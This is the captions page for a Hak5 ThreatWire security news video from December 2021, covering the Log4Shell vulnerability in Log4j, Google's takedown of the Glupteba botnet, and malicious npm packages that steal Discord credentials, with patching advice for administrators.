Log4Shell & Log4j Explained - ThreatWire

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
Greetings!! I’m Shannon Morse and this is ThreatWire for December 14, 2021! This is your weekly summary of the threats to our security, privacy and Internet freedom. THANK YOU to long time patron David for the upgrade, and to Bry for joining this week on Patreon. Patreon.com/ThreatWire as always to keep this show ad free. And if you want to support the show but don’t wanna join on Patreon, you can grab your own ThreatWire merch for the holidays at the link below. Use the coupon code Turkey for 15% off!. With that, onto the news!! I know y’all are all here for this Log4Shell attack so let’s get right into it. On Thursday last week this new vulnerability started showing up online via news sources and within the infosec community. By the weekend, it’d become widely known to be a huge concern given it’s ease of attack and the potential for compromising servers given it’s attack surface is relatively ubiquitous and used across millions of apps. Log4Shell is tracked as CVE 2021-44228 and is the nickname given to a critical zero day vulnerability, and it has a maximum severity score of 10, meaning it’s a problem. A big problem. This attack was first noted in the wild to be used against a Minecraft server in a remote code exploitation but the reason the Minecraft server was compromised also affects millions of other apps and servers because the source of this problem is used by so many. The source is called Log4j. Log4j is an open source Java utility by Apache built into a bunch of apps that easily logs user input and performs network lookups within the JNDI (or Java Naming and Directory Interface), to obtain services from LDAP (or the Lightweight Directory Access Protocol). Log4j captures a message as a URL, fetches the correct response, and can execute code with full privileges. So researchers found out this can be exploited in text by using a specific syntax - an attacker could scan for vulnerable servers, find one, and use a text box to enter a line of code to trigger the log4j utility to start a lookup. But instead of just allowing you to do something like a user would - i.e. logging into your apple id, connecting to a minecraft server, whatever… this would allow them to do things like install crypto miners, grow a botnet, or exfiltrate data from the targeted server. A great example of this is changing your iphones name on your iphone to the delegated syntax, which triggers the vuln on apple’s servers as this red teamer shared. Yesterday Tom Anthony, CTO of searchpilot, pointed out that if you don’t close the payload with a closing bracket, it’ll just keep exfiltrating data until the next bracket comes along. So that’s great. Just great. So what’s the explanation you can tell your fam when they see TV news mention it in a one liner to freak everyone out? CTO of SonaType Iikka Turunen gave me this comparison: it’s like a captains log on a ship but for software. This allows programs to record what happens when it runs, and usually when a user enters something simple into a text form, it’s boring stuff (like changing your iphones name). But someone, somewhere found out you can enter that code into these text fields to make the app do weird stuff. For admins, they gotta update the app… and anything else they use written in java, and a lot of companies just don’t know what components go where so they gotta look at literally everything to make sure each and every bit is patched. That’s what makes this so serious. Even though it was publicly disclosed last week, Matthew Prince, cofounder and ceo of cloudflare, tweeted they saw evidence of it being used in the wild as early as December 1. That means it’s been used for a while before anyone knew about the problem. A Github page shows potential impact and while not verified, includes a slew of potentially affected brands including Twitter, Steam, Apple, Tesla, Amazon, Unifi, Webex, LinkedIn and more. There’s also an extensive list of responses from brands linked on github as well. Researchers have explained that if you use Apache Struts, you’re likely vulnerable. Sadly, users can’t do much since this requires app configurations and server updates for programs and websites you use. The best users can do is alert the industries they rely on to check for the vulnerable utility and update. Services should update log4j to version 2.15.0, but it’s kind of like putting out a ton of little fires - one app can use a ton of additional backend programs to run - and each of those might use log4j too. Microsoft and Sophos both have intensive articles explaining how you can prevent, detect, and hunt down any exploitation of this vulnerability. And many companies have already started patching. Please treat your fellow infosec employees and admins with some empathy and patience through this holiday season. I’m sure a lot of folks are working overtime to patch this problem with zero thanks so let me be the one to say thank you for your hard work. You deserve a raise for all you do to keep users protected. Botnets are still alive and well at the end of 2021, but Google has stepped in to disrupt one botnet that has infected 1 million devices. This botnet is coined Glupteba and it infects Windows machines. Operators were using google services to distribute the botnet, so, with the help of the CyberCrime Investigation Group, Google’s Threat Analysis Group terminated 63 million google docs, 1183 google accounts, 908 cloud projects and 870 google ads that were being using. But Glupteba is still being spread using the bitcoin blockchain as it’s command and control server for resilience. Google TAG also worked with hosting and infrastructure providers to remove servers hosting the botnet and put a warning page in front of malicious domains. Google has taken it a step further by filing a lawsuit against who they allege are behind the operation of this botnet. Google filed a lawsuit in the southern district of new york against two Russian defendants, stating they’ve infiltrated over a million computers and devices to create this botnet for illicit purposes such as stealing google users’ login credentials. But that’s not all! Glupteba was being used to steal account information, vend credit cards to create fraudulent purchases via Google Ads, serve up pop up ads on compromised machines, and mine cryptocurrency. This botnet was first documented a decade ago and it just keeps going. This disruption will help, but it likely won’t be the end of it’s spread. I love it when y’all send me these adorable pictures of your pets so these are a few from my hush puppy Patreon Alliance members. You can always support this content and keep it ad free for as little as $2 / month, and get a slew of perks at the same time! Each alliance member gets over 10 perks as soon as you sign up at patreon.com/threatwire. With that, now onto the third story. The open source package repository called NPM was being used to distribute 17 malicious packages that are being used to steal credentials and information on discord servers. While discord is usually used for user communication and community, it’s also used as Command and Control channels for botnets, as well as a proxy for downloading data. Attackers appear to have used a series of techniques to trick devs into downloading the malicious package instead of a legitimate one. They’re able to do this because repositories are trusted by devs and machines, so no flags are raised whenever comms happen between the repo and the dev platform. Automated installation such as using the NPM client also create a “ripe attack vector”, according to two jFrog researchers who discussed this attack vector via a post published on Wednesday. The malicious NPM packages work in a variety of ways. A few are purported to be the discord.js library but actually include malicious code. Another acts like a discord bot that fixes errors but actually steals credit card information. A third example includes a remote access trojan. While these specific packages have been removed from NPMs repositories, if you download a lot of open source packages, it’s crucial to only download them from legitimate sources. Want more tech content? Subscribe at youtube.com/ShannonMorse for my gift guides. Don't forget to like and subscribe to this channel as well! Next week is my annual Biggest hacks video, then I’ll be out for the holidays and back in January. I'm Shannon Morse, I'll see you on the Internet!
Info
Channel: Hak5
Views: 65,362
Rating: undefined out of 5
Keywords: hak5, hack, technology, darren kitchen, shannon morse, snubs, hack5, hacker, red team, pentest, pentester, pentesting, penetration testing, cyber security, information security, infosec, google, tag, log4shell, log4j, java, npm, botnet, discord
Id: ysFB6JKTs5U
Channel Id: undefined
Length: 10min 25sec (625 seconds)
Published: Tue Dec 14 2021
Related Videos
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.